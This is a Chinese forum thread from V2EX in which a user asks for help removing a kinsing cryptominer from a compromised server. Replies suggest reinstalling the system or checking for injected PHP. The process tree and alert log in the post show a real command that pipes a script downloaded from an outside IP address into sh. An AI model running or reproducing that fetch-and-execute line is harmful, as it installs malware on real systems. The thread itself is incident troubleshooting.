异常网络连接-主动连接恶意下载源

2020-02-16 12:31:58 +08:00
 nohello

好烦躁,服务器被搞了个挖矿程序,弄不掉

─php-fpm │ ├─php-fpm ... │ ├─php-fpm ... │ ├─php-fpm ... │ ├─php-fpm ... │ ├─php-fpm ... │ │ └─sh -c wget -q -O - 217.12.221.244/t.sh|sh │ │ ├─sh │ │ └─wget -q -O - 217.12.221.244/t.sh │ ├─php-fpm ... │ ├─php-fpm

帮我看看这个 sh 搞到哪里的,定时任务全删了,文件 kinsing 也删除了,还是有

1860 次点击
所在节点    问与答
5 条回复
nohello
2020-02-16 12:33:22 +08:00
该告警由如下引擎检测发现:
父进程路径:/usr/bin/bash
父进程命令行:sh -c wget -q -O - 217.12.221.244/t.sh|sh
父进程 id:6260
进程 id:6261
用户名:www
URL 链接: http://217.12.221.244/t.sh
进程路径:/usr/bin/wget
命令行参数:wget -q -O - 217.12.221.244/t.sh
与该 URL 有关联的漏洞:None
oott123
2020-02-16 12:44:49 +08:00
重装系统
sujin190
2020-02-16 13:17:52 +08:00
看看谁启动的呗,fpm 启动的那么说明要么你的 PHP 代码被注入了,要么 php-fpm 都被替换了
seabee
2020-02-16 23:46:54 +08:00
有两个病毒文件,一个是 kinsing,另一个是*fsi 的,网上有方法删
lipaowang
2020-02-27 15:45:55 +08:00
楼主你好,这个问题你解决了么,解决方案是什么

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/644977

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX